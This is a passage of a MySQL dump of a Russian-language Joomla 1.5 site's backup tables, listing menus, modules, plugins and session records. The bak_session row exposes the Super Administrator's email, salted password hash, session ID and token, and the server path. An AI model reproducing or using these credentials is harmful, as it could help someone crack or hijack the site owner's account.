INSERT INTO `bak_menu` VALUES (1,'mainmenu','Главная','home','index.php?option=com_content&view=frontpage','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'show_page_title=1\npage_title=Главная страница\nshow_description=0\nshow_description_image=0\nnum_leading_articles=1\nnum_intro_articles=4\nnum_columns=2\nnum_links=4\nshow_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\norderby_pri=\norderby_sec=front\nshow_pagination=2\nshow_pagination_results=1\nshow_noauth=0\nlink_titles=0\nshow_intro=1\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=1\nshow_create_date=1\nshow_modify_date=1\nshow_item_navigation=0\nshow_readmore=1\nshow_vote=0\nshow_icons=1\nshow_pdf_icon=1\nshow_print_icon=1\nshow_email_icon=1\nshow_hits=1\n\n',0,0,1);
/*!40000 ALTER TABLE `bak_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_menu_types`
--

DROP TABLE IF EXISTS `bak_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_menu_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menutype` varchar(75) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `description` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_menu_types`
--

LOCK TABLES `bak_menu_types` WRITE;
/*!40000 ALTER TABLE `bak_menu_types` DISABLE KEYS */;
INSERT INTO `bak_menu_types` VALUES (1,'mainmenu','Главное меню','Главное меню этого сайта');
/*!40000 ALTER TABLE `bak_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_messages`
--

DROP TABLE IF EXISTS `bak_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_messages` (
  `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id_to` int(10) unsigned NOT NULL DEFAULT '0',
  `folder_id` int(10) unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` int(11) NOT NULL DEFAULT '0',
  `priority` int(1) unsigned NOT NULL DEFAULT '0',
  `subject` text NOT NULL,
  `message` text NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_messages`
--

LOCK TABLES `bak_messages` WRITE;
/*!40000 ALTER TABLE `bak_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_messages_cfg`
--

DROP TABLE IF EXISTS `bak_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_messages_cfg` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) NOT NULL DEFAULT '',
  `cfg_value` varchar(255) NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_messages_cfg`
--

LOCK TABLES `bak_messages_cfg` WRITE;
/*!40000 ALTER TABLE `bak_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_migration_backlinks`
--

DROP TABLE IF EXISTS `bak_migration_backlinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_migration_backlinks` (
  `itemid` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `url` text NOT NULL,
  `sefurl` text NOT NULL,
  `newurl` text NOT NULL,
  PRIMARY KEY (`itemid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_migration_backlinks`
--

LOCK TABLES `bak_migration_backlinks` WRITE;
/*!40000 ALTER TABLE `bak_migration_backlinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_migration_backlinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_modules`
--

DROP TABLE IF EXISTS `bak_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text NOT NULL,
  `content` text NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) DEFAULT NULL,
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) DEFAULT NULL,
  `numnews` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `iscore` tinyint(4) NOT NULL DEFAULT '0',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `control` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`)
) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_modules`
--

LOCK TABLES `bak_modules` WRITE;
/*!40000 ALTER TABLE `bak_modules` DISABLE KEYS */;
INSERT INTO `bak_modules` VALUES (2,'Авторизация','',1,'login',0,'0000-00-00 00:00:00',1,'mod_login',0,0,1,'',1,1,''),(3,'Самое популярное','',3,'cpanel',0,'0000-00-00 00:00:00',1,'mod_popular',0,2,1,'',0,1,''),(4,'Последние Материалы','',4,'cpanel',0,'0000-00-00 00:00:00',1,'mod_latest',0,2,1,'ordering=c_dsc\nuser_id=0\ncache=0\n\n',0,1,''),(5,'Перечень меню','',5,'cpanel',0,'0000-00-00 00:00:00',1,'mod_stats',0,2,1,'',0,1,''),(6,'Непрочитанные сообщения','',1,'header',0,'0000-00-00 00:00:00',1,'mod_unread',0,2,1,'',1,1,''),(7,'Сейчас на сайте','',2,'header',0,'0000-00-00 00:00:00',1,'mod_online',0,2,1,'',1,1,''),(8,'Инструментальная панель','',1,'toolbar',0,'0000-00-00 00:00:00',1,'mod_toolbar',0,2,1,'',1,1,''),(9,'Панель быстрого доступа','',1,'icon',0,'0000-00-00 00:00:00',1,'mod_quickicon',0,2,1,'',1,1,''),(10,'Авторизованные пользователи','',2,'cpanel',0,'0000-00-00 00:00:00',1,'mod_logged',0,2,1,'',0,1,''),(11,'Авторские права Joomla!','',0,'footer',0,'0000-00-00 00:00:00',1,'mod_footer',0,0,1,'',1,1,''),(12,'Меню администратора','',1,'menu',0,'0000-00-00 00:00:00',1,'mod_menu',0,2,1,'',0,1,''),(13,'Подменю администратора','',1,'submenu',0,'0000-00-00 00:00:00',1,'mod_submenu',0,2,1,'',0,1,''),(14,'Статус пользователя','',1,'status',0,'0000-00-00 00:00:00',1,'mod_status',0,2,1,'',0,1,''),(15,'Заголовок','',1,'title',0,'0000-00-00 00:00:00',1,'mod_title',0,2,1,'',0,1,''),(16,'Меню','',0,'top',62,'2010-11-02 18:35:13',1,'mod_mainmenu',0,0,0,'menutype=mainmenu\nmenu_style=list\nstartLevel=0\nendLevel=0\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=\nmoduleclass_sfx=_menu\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,'');
/*!40000 ALTER TABLE `bak_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_modules_menu`
--

DROP TABLE IF EXISTS `bak_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_modules_menu`
--

LOCK TABLES `bak_modules_menu` WRITE;
/*!40000 ALTER TABLE `bak_modules_menu` DISABLE KEYS */;
INSERT INTO `bak_modules_menu` VALUES (16,0);
/*!40000 ALTER TABLE `bak_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_newsfeeds`
--

DROP TABLE IF EXISTS `bak_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` text NOT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link` text NOT NULL,
  `filename` varchar(200) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(11) unsigned NOT NULL DEFAULT '1',
  `cache_time` int(11) unsigned NOT NULL DEFAULT '3600',
  `checked_out` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `published` (`published`),
  KEY `catid` (`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_newsfeeds`
--

LOCK TABLES `bak_newsfeeds` WRITE;
/*!40000 ALTER TABLE `bak_newsfeeds` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_plugins`
--

DROP TABLE IF EXISTS `bak_plugins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_plugins` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL DEFAULT '',
  `element` varchar(100) NOT NULL DEFAULT '',
  `folder` varchar(100) NOT NULL DEFAULT '',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(3) NOT NULL DEFAULT '0',
  `iscore` tinyint(3) NOT NULL DEFAULT '0',
  `client_id` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_folder` (`published`,`client_id`,`access`,`folder`)
) ENGINE=MyISAM AUTO_INCREMENT=35 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_plugins`
--

LOCK TABLES `bak_plugins` WRITE;
/*!40000 ALTER TABLE `bak_plugins` DISABLE KEYS */;
INSERT INTO `bak_plugins` VALUES (1,'Авторизация - Joomla','joomla','authentication',0,1,1,1,0,0,'0000-00-00 00:00:00',''),(2,'Авторизация - LDAP','ldap','authentication',0,2,0,1,0,0,'0000-00-00 00:00:00','host=\nport=389\nuse_ldapV3=0\nnegotiate_tls=0\nno_referrals=0\nauth_method=bind\nbase_dn=\nsearch_string=\nusers_dn=\nusername=\npassword=\nldap_fullname=fullName\nldap_email=mail\nldap_uid=uid\n\n'),(3,'Авторизация - GMail','gmail','authentication',0,4,0,0,0,0,'0000-00-00 00:00:00',''),(4,'Авторизация - OpenID','openid','authentication',0,3,0,0,0,0,'0000-00-00 00:00:00',''),(5,'Пользователь - Joomla!','joomla','user',0,0,1,0,0,0,'0000-00-00 00:00:00','autoregister=1\n\n'),(6,'Поиск - Содержимое','content','search',0,1,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\nsearch_content=1\nsearch_uncategorised=1\nsearch_archived=1\n\n'),(7,'Поиск - Контакты','contacts','search',0,3,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(8,'Поиск - Категории','categories','search',0,4,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(9,'Поиск - Разделы','sections','search',0,5,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(10,'Поиск - Ленты новостей','newsfeeds','search',0,6,1,0,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(11,'Поиск - Веб-ссылки','weblinks','search',0,2,1,1,0,0,'0000-00-00 00:00:00','search_limit=50\n\n'),(12,'Содержимое - Разрыв страницы','pagebreak','content',0,10000,1,1,0,0,'0000-00-00 00:00:00','enabled=1\ntitle=1\nmultipage_toc=1\nshowall=1\n\n'),(13,'Содержимое - Рейтинг','vote','content',0,4,1,1,0,0,'0000-00-00 00:00:00',''),(14,'Содержимое - Маскировка e-mail','emailcloak','content',0,5,1,0,0,0,'0000-00-00 00:00:00','mode=1\n\n'),(15,'Содержимое - Подсветка кода (GeSHi)','geshi','content',0,5,0,0,0,0,'0000-00-00 00:00:00',''),(16,'Содержимое - Загрузка модуля в Материал','loadmodule','content',0,6,1,0,0,0,'0000-00-00 00:00:00','enabled=1\nstyle=0\n\n'),(17,'Содержимое - Навигация по страницам','pagenavigation','content',0,2,1,1,0,0,'0000-00-00 00:00:00','position=1\n\n'),(18,'Редактор - Без редактора','none','editors',0,0,1,1,0,0,'0000-00-00 00:00:00',''),(19,'Редактор - TinyMCE','tinymce','editors',0,0,1,1,0,0,'0000-00-00 00:00:00','theme=advanced\ncleanup=1\ncleanup_startup=0\nautosave=0\ncompressed=0\nrelative_urls=1\ntext_direction=ltr\nlang_mode=1\nlang_code=en\ninvalid_elements=applet\ncontent_css=1\ncontent_css_custom=\nnewlines=0\ntoolbar=top\nhr=1\nsmilies=1\ntable=1\nstyle=1\nlayer=1\nxhtmlxtras=0\ntemplate=0\ndirectionality=1\nfullscreen=1\nhtml_height=550\nhtml_width=750\npreview=1\ninsertdate=1\nformat_date=%Y-%m-%d\ninserttime=1\nformat_time=%H:%M:%S\n\n'),(20,'Редактор - XStandard Lite 2.0','xstandard','editors',0,0,0,1,0,0,'0000-00-00 00:00:00',''),(21,'Кнопка редактора - Изображение','image','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(22,'Кнопка редактора - Разрыв страницы','pagebreak','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(23,'Кнопка редактора - Подробнее','readmore','editors-xtd',0,0,1,0,0,0,'0000-00-00 00:00:00',''),(24,'XML-RPC - Joomla','joomla','xmlrpc',0,7,0,1,0,0,'0000-00-00 00:00:00',''),(25,'XML-RPC - Blogger API','blogger','xmlrpc',0,7,0,1,0,0,'0000-00-00 00:00:00','catid=1\nsectionid=0\n\n'),(27,'Система - SEF','sef','system',0,1,1,0,0,0,'0000-00-00 00:00:00',''),(28,'Система - Отладка','debug','system',0,2,1,0,0,0,'0000-00-00 00:00:00','queries=1\nmemory=1\nlangauge=1\n\n'),(29,'Система - Поддержка старых расширений (Legacy)','legacy','system',0,3,0,1,0,0,'0000-00-00 00:00:00','route=0\n\n'),(30,'Система - Кэш','cache','system',0,4,0,1,0,0,'0000-00-00 00:00:00','browsercache=0\ncachetime=15\n\n'),(31,'Система - Логи','log','system',0,5,0,1,0,0,'0000-00-00 00:00:00',''),(32,'Система - Запомнить меня','remember','system',0,6,1,1,0,0,'0000-00-00 00:00:00',''),(33,'Система - Поддержка старых ссылок','backlink','system',0,7,0,1,0,0,'0000-00-00 00:00:00',''),(34,'Система - Обновление Mootools','mtupgrade','system',0,8,0,1,0,0,'0000-00-00 00:00:00','');
/*!40000 ALTER TABLE `bak_plugins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_poll_data`
--

DROP TABLE IF EXISTS `bak_poll_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_poll_data` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `pollid` int(11) NOT NULL DEFAULT '0',
  `text` text NOT NULL,
  `hits` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `pollid` (`pollid`,`text`(1))
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_poll_data`
--

LOCK TABLES `bak_poll_data` WRITE;
/*!40000 ALTER TABLE `bak_poll_data` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_poll_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_poll_date`
--

DROP TABLE IF EXISTS `bak_poll_date`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_poll_date` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `vote_id` int(11) NOT NULL DEFAULT '0',
  `poll_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `poll_id` (`poll_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_poll_date`
--

LOCK TABLES `bak_poll_date` WRITE;
/*!40000 ALTER TABLE `bak_poll_date` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_poll_date` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_poll_menu`
--

DROP TABLE IF EXISTS `bak_poll_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_poll_menu` (
  `pollid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`pollid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_poll_menu`
--

LOCK TABLES `bak_poll_menu` WRITE;
/*!40000 ALTER TABLE `bak_poll_menu` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_poll_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_polls`
--

DROP TABLE IF EXISTS `bak_polls`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_polls` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `voters` int(9) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `lag` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_polls`
--

LOCK TABLES `bak_polls` WRITE;
/*!40000 ALTER TABLE `bak_polls` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_polls` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_sections`
--

DROP TABLE IF EXISTS `bak_sections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_sections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` text NOT NULL,
  `scope` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_scope` (`scope`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_sections`
--

LOCK TABLES `bak_sections` WRITE;
/*!40000 ALTER TABLE `bak_sections` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_sections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_session`
--

DROP TABLE IF EXISTS `bak_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_session` (
  `username` varchar(150) DEFAULT '',
  `time` varchar(14) DEFAULT '',
  `session_id` varchar(200) NOT NULL DEFAULT '0',
  `guest` tinyint(4) DEFAULT '1',
  `userid` int(11) DEFAULT '0',
  `usertype` varchar(50) DEFAULT '',
  `gid` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `data` longtext,
  PRIMARY KEY (`session_id`(64)),
  KEY `whosonline` (`guest`,`usertype`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_session`
--

LOCK TABLES `bak_session` WRITE;
/*!40000 ALTER TABLE `bak_session` DISABLE KEYS */;
INSERT INTO `bak_session` VALUES ('admin','1288722913','c55f6e742dfb46ba5d3cf943fe2af686',0,62,'Super Administrator',25,1,'__default|a:8:{s:22:\"session.client.browser\";s:104:\"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 WebMoney Advisor\";s:15:\"session.counter\";i:112;s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:4:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}s:11:\"application\";a:1:{s:4:\"data\";O:8:\"stdClass\":1:{s:4:\"lang\";s:0:\"\";}}s:10:\"com_cpanel\";a:1:{s:4:\"data\";O:8:\"stdClass\":1:{s:9:\"mtupgrade\";O:8:\"stdClass\":1:{s:7:\"checked\";b:1;}}}s:9:\"com_menus\";a:1:{s:4:\"data\";O:8:\"stdClass\":1:{s:8:\"menutype\";s:8:\"mainmenu\";}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";s:2:\"62\";s:4:\"name\";s:13:\"Administrator\";s:8:\"username\";s:5:\"admin\";s:5:\"email\";s:20:\"ekvatorprint@mail.ru\";s:8:\"password\";s:65:\"4bfcfbe326c9e1ce13b584c2a4782c3f:lDtQT3gbuZ9lHb63Lr0QtMJyuW4RSLOT\";s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";s:19:\"Super Administrator\";s:5:\"block\";s:1:\"0\";s:9:\"sendEmail\";s:1:\"1\";s:3:\"gid\";s:2:\"25\";s:12:\"registerDate\";s:19:\"2010-11-02 19:44:26\";s:13:\"lastvisitDate\";s:19:\"2010-11-02 17:46:09\";s:10:\"activation\";s:0:\"\";s:6:\"params\";s:0:\"\";s:3:\"aid\";i:2;s:5:\"guest\";i:0;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:95:\"/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}s:13:\"session.token\";s:32:\"845cddf9c1ec876add4ca3805f04b648\";s:19:\"session.timer.start\";i:1288721439;s:18:\"session.timer.last\";i:1288722913;s:17:\"session.timer.now\";i:1288722913;}'),('','1288722986','47qi2vl58jkhkjnhiniht4cjp3',1,0,'',0,0,'__default|a:7:{s:15:\"session.counter\";i:41;s:19:\"session.timer.start\";i:1288721753;s:18:\"session.timer.last\";i:1288722916;s:17:\"session.timer.now\";i:1288722986;s:22:\"session.client.browser\";s:104:\"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 WebMoney Advisor\";s:8:\"registry\";O:9:\"JRegistry\":3:{s:17:\"_defaultNameSpace\";s:7:\"session\";s:9:\"_registry\";a:1:{s:7:\"session\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:4:\"user\";O:5:\"JUser\":19:{s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:3:\"gid\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:3:\"aid\";i:0;s:5:\"guest\";i:1;s:7:\"_params\";O:10:\"JParameter\":7:{s:4:\"_raw\";s:0:\"\";s:4:\"_xml\";N;s:9:\"_elements\";a:0:{}s:12:\"_elementPath\";a:1:{i:0;s:95:\"/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/libraries/joomla/html/parameter/element\";}s:17:\"_defaultNameSpace\";s:8:\"_default\";s:9:\"_registry\";a:1:{s:8:\"_default\";a:1:{s:4:\"data\";O:8:\"stdClass\":0:{}}}s:7:\"_errors\";a:0:{}}s:9:\"_errorMsg\";N;s:7:\"_errors\";a:0:{}}}');
/*!40000 ALTER TABLE `bak_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_stats_agents`
--

DROP TABLE IF EXISTS `bak_stats_agents`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_stats_agents` (
  `agent` varchar(255) NOT NULL DEFAULT '',
  `type` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '1'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_stats_agents`
--

LOCK TABLES `bak_stats_agents` WRITE;
/*!40000 ALTER TABLE `bak_stats_agents` DISABLE KEYS */;
/*!40000 ALTER TABLE `bak_stats_agents` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_templates_menu`
--

DROP TABLE IF EXISTS `bak_templates_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_templates_menu` (
  `template` varchar(255) NOT NULL DEFAULT '',
  `menuid` int(11) NOT NULL DEFAULT '0',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`menuid`,`client_id`,`template`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `bak_templates_menu`
--

LOCK TABLES `bak_templates_menu` WRITE;
/*!40000 ALTER TABLE `bak_templates_menu` DISABLE KEYS */;
INSERT INTO `bak_templates_menu` VALUES ('jj67_secondary',0,0),('khepri',0,1);
/*!40000 ALTER TABLE `bak_templates_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `bak_users`
--

DROP TABLE IF EXISTS `bak_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `bak_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  `usertype` varchar(25) NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `gid` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
